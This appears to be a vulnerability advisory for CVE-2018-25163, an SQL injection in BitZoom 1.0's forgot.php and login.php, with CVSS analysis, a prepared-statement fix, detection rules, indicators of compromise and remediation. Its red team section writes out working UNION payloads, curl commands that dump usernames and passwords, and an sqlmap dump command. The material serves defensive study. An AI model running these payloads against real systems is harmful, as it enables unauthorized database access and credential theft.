CVE-2018-25163
Executive Summary
CVE-2018-25163 is a critical SQL injection vulnerability affecting BitZoom 1.0, an unmaintained application. The flaw resides in the forgot.php and login.php scripts, where the rollno and username parameters are not sanitized before being used in SQL queries. An unauthenticated attacker can craft POST requests containing SQL UNION statements to extract arbitrary data from the database, including credentials, schema information, and other sensitive records. The CVSS score of 8.2 (High) reflects the ease of exploitation (network-based, low complexity, no privileges required) and the high impact on confidentiality, integrity, and availability. No official patch exists, making this a permanent risk for any instance still running BitZoom 1.0.

Supply Chain & Package Security
This vulnerability is not related to any package manager (NPM, PyPI, Go, Ruby). It is a standalone PHP application. However, if BitZoom is bundled or distributed as part of a larger software package, the supply chain risk is elevated due to the lack of a patch.
CVSS Breakdown & Threat Level
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – No authentication needed.
- User Interaction (UI): None (N) – No user action required.
- Scope (S): Unchanged (U) – The vulnerable component and the impacted component are the same.
- Confidentiality (C): High (H) – Full database read access.
- Integrity (I): High (H) – Data can be modified via stacked queries or second-order injection.
- Availability (A): High (H) – Potential for denial of service via resource exhaustion or database corruption.
Threat Level: Critical. The combination of unauthenticated remote exploitation, no patch, and full database compromise makes this a high-priority target for attackers.
Deep Dive & Mechanics
The vulnerability is a classic SQL injection in the forgot.php and login.php endpoints. The application directly concatenates user-supplied input from the rollno and username POST parameters into SQL queries without any sanitization or parameterized statements.
Vulnerable Code Pattern (Conceptual PHP):
// forgot.php
$rollno = $_POST['rollno'];
$query = "SELECT * FROM users WHERE rollno = '$rollno'";
$result = mysqli_query($conn, $query);
An attacker can submit a POST request with a payload like:
rollno=1' UNION SELECT username,password FROM users-- -
This modifies the query to:
SELECT * FROM users WHERE rollno = '1' UNION SELECT username,password FROM users-- -'
The UNION statement appends the results of a second SELECT query, allowing the attacker to retrieve arbitrary data from the database. The -- - comment sequence removes the rest of the original query, preventing syntax errors.
Database Schema Extraction:
Attackers can use information_schema to enumerate tables and columns:
rollno=1' UNION SELECT table_name,column_name FROM information_schema.columns WHERE table_schema=database()-- -
Impact: Full database compromise, including user credentials, session tokens, and application data. If the database user has write privileges, data manipulation or deletion is also possible.
Vulnerable vs. Patched Code
Since no patch exists, there is no patched code to compare. The vulnerable code is any instance of BitZoom 1.0 that directly concatenates user input into SQL queries.
Vulnerable Code (Conceptual):
// login.php
$username = $_POST['username'];
$query = "SELECT * FROM users WHERE username = '$username'";
Patched Code (Hypothetical):
// login.php
$username = $_POST['username'];
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ?");
$stmt->bind_param("s", $username);
$stmt->execute();
$result = $stmt->get_result();
The fix would involve using prepared statements with parameterized queries, which separate SQL logic from data.
Exploitation & Lab Setup
Red Team (Offensive)
Lab Setup:
- Deploy BitZoom 1.0 on a local server (e.g., XAMPP, LAMP).
- Ensure the database contains sample data (e.g., users table with usernames and passwords).
Exploitation Steps:
Identify vulnerable endpoints: Send a POST request to
forgot.phporlogin.phpwith a single quote in therollnoorusernameparameter. A database error confirms SQL injection.Extract database version:
curl -X POST http://target/forgot.php -d "rollno=1' UNION SELECT @@version,2-- -"Enumerate tables:
curl -X POST http://target/forgot.php -d "rollno=1' UNION SELECT table_name,2 FROM information_schema.tables WHERE table_schema=database()-- -"Dump user credentials:
curl -X POST http://target/forgot.php -d "rollno=1' UNION SELECT username,password FROM users-- -"
Automated Exploitation (sqlmap):
sqlmap -u "http://target/forgot.php" --data="rollno=1" --batch --dump
Blue Team (Defensive)
Detection:
- Monitor for POST requests to
forgot.phporlogin.phpcontaining SQL keywords (UNION,SELECT,FROM,--,#). - Look for abnormal response sizes or database error messages in server logs.
- Use WAF rules to block common SQL injection patterns.
Honeypot:
- Deploy a fake BitZoom instance with a modified database that logs all queries. Any
UNIONorOR 1=1pattern indicates an attack.
Forensics:
- Examine web server access logs for suspicious POST parameters.
- Check database logs for unexpected queries (if enabled).
Indicators of Compromise (IOCs)
Network IOCs:
- POST requests to
/forgot.phpor/login.phpwith parameters containingUNION,SELECT,FROM,--,#,OR 1=1. - Unusually large response bodies from these endpoints.
- Database error messages in HTTP responses (e.g., "You have an error in your SQL syntax").
- POST requests to
Host IOCs:
- Unexpected database queries in MySQL logs (e.g.,
SELECT * FROM users UNION SELECT ...). - New user accounts or modified data in the application database.
- Web server logs showing repeated failed login attempts with SQL-like patterns.
- Unexpected database queries in MySQL logs (e.g.,
File IOCs:
- No specific file artifacts, but the presence of sqlmap or similar tools on an attacker's machine.

Remediation & Mitigation
Since no official patch exists, the following mitigations are recommended:
- Immediate Action: Discontinue use of BitZoom 1.0. Migrate to a supported alternative.
- Virtual Patching: Deploy a Web Application Firewall (WAF) with rules to block SQL injection patterns targeting
forgot.phpandlogin.php. - Input Validation: If migration is not possible, implement server-side input validation and parameterized queries (requires code modification).
- Network Segmentation: Isolate the application server to limit lateral movement in case of compromise.
- Monitoring: Enable detailed logging and alerting for SQL injection attempts.
- Database Hardening: Use a database user with minimal privileges (e.g., read-only for the application) to limit damage.
Long-term: Replace BitZoom 1.0 with a modern, maintained application.
